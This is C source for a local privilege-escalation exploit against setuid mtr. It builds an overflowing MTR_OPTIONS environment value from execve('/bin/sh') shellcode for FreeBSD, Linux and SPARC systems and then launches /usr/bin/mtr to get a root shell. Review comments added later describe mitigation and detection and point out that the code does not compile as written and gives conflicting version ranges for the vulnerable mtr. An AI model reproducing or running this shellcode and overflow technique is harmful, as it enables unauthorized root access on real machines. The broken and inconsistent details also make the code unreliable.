Local root exploit for mtr versions lower than 4.0.6. Vulnerability originally found by KF of Snosoft.
d8abcbb929ad05dfb21ec534c2ad715d568011e3df645bbfcfb8825327e5eb29
/*******************************************************************
* mtrewt.c - local suid root compromise *
* &by PREEM of ADIDAS (All day I dream about Sploiting!!) *
********************************************************************
* *
* This is unpublished proprietary source code of ADIDAS - !@#!#$! *
* *
* (C) COPYRIGHT ADIDAS (All Day I Dream About Sploiting) *
* ADIDAS IS A REGISTERED TRADEMARK (c) , 2003 *
********************************************************************
* All Rights Reserved *
* *
* bug found by KF of Snosoft *
* *
* keep it private! *
* don't distribute! *
********************************************************************
* Vulnerable: mtr <4.0.6 (Unix)/MTR_OPTIONS/ PRIVATE DISTRIBUTION!!*
********************************************************************
* Greetz: They Know who they are!! All my friends :)) *
********************************************************************
*/
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#define OFFSET 524 /*it may differ*/ /* NOTE(review): OFFSET is defined but not referenced anywhere in the visible code */
/* Print the usage banner to stderr and terminate with status 1.
 * progname is echoed verbatim into the usage line; this never returns. */
void syntax(char *progname)
{
    fputs("[+] Vuln in mtr <0.46\n", stderr);
    fprintf(stderr, "[+] Usage: %s ostype\n\n", progname);
    fputs(" [+] OS types are: [1] FreeBSD [2] Linux [3] SPARC/Solaris [4] SPARC/SunOS\n\n", stderr);
    exit(1);
}
int main(int argc, char *argv[])
{
/* Builds an oversized MTR_OPTIONS environment value from a byte string
 * chosen by the "ostype" argument (egg) and then exec()s /usr/bin/mtr
 * with that environment. The banners in this file describe the target
 * as the MTR_OPTIONS handling of mtr <0.46; note the header comment
 * above says <4.0.6 instead, so the two version claims disagree.
 *
 * Defender's view: the preconditions are an mtr binary installed
 * setuid root ("local suid root compromise" per the header) and the
 * ability to set its environment. Mitigation is a fixed mtr release
 * and/or not installing it setuid; a detection hook is an mtr process
 * started with an abnormally long MTR_OPTIONS value (128 "A " records
 * followed by ten copies of egg, see the loops below).
 *
 * As written this file does not compile: `progname` in the second
 * banner line below is not a name declared in main.
 */
char *egg;
char buf[4092]; /* NOTE(review): never initialized before the strcat() calls below, so its starting contents are indeterminate */
char buf2[4128];
int os, i;
if (argc != 2) syntax(argv[0]);
os = atoi(argv[1]); /* atoi() yields 0 for non-numeric input; 0 matches no branch and falls through to syntax() */
if (os == 1) /* os type 1, "FreeBSD" in the usage text */
egg =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80";
else if (os == 2) /* os type 2, "Linux" in the usage text */
egg =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
// "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
// "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
// "\xb0\x3b\x50\xcd\x80";
else if (os == 3) /* os type 3, "SPARC/Solaris" in the usage text */
egg = /* must find another shellcode without \x20 */
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
"\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08";
// "\x20\xbf\xff\xff\x20\xbf\xff\xff"
// "\x7f\xff\xff\xff\x90\x03\xe0\x20\x92\x02\x20\x10\xc0\x22\x20\x08"
// "\xd0\x22\x20\x10\xc0\x22\x20\x14\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";
else if (os == 4) /* os type 4, "SPARC/SunOS" in the usage text */
egg = /* idem */
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\xaa\x10\x3f\xff"
"\x91\xd5\x60\x01\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd5\x60\x01";
else syntax(argv[0]);
/* Banner duplicated from syntax(); unlike syntax() this path continues instead of exiting. */
fprintf(stderr, "[+] Vuln in mtr <0.46 - by PREEM of ADIDAS\n");
fprintf(stderr, "[+] Usage: %s ostype\n\n", progname); /* NOTE(review): progname is undeclared here (it is syntax()'s parameter) */
fprintf(stderr," [+] OS types are: [1] FreeBSD [2] Linux [3] SPARC/Solaris [4] SPARC/SunOS\n\n");
for (i = 0; i < 128; i++) /* fill the first 128 records */
strcat(buf, "A ");
for (i = 0; i < 10; i++) /* fill extra 10 records for overflow (see mtr.c) */
{ /* 10 extra records should be enough for any syst */
strcat(buf, egg);
strcat(buf, " ");
}
/* The whole record string becomes the value of MTR_OPTIONS in this process's environment. */
strcpy(buf2, "MTR_OPTIONS=");
printf("[+] Please Wait...");
strcat(buf2, buf);
putenv(buf2);
printf("[+] Voila! Check for m4d rewt..");
/* Hard-coded exec target; execl() only returns on failure and that return is not checked. */
execl("/usr/bin/mtr", "mtr", NULL); //might be in different path ;) work it 0ff!
}
/* PRIVATE ADIDAS SOURCE MATERIAL!!! */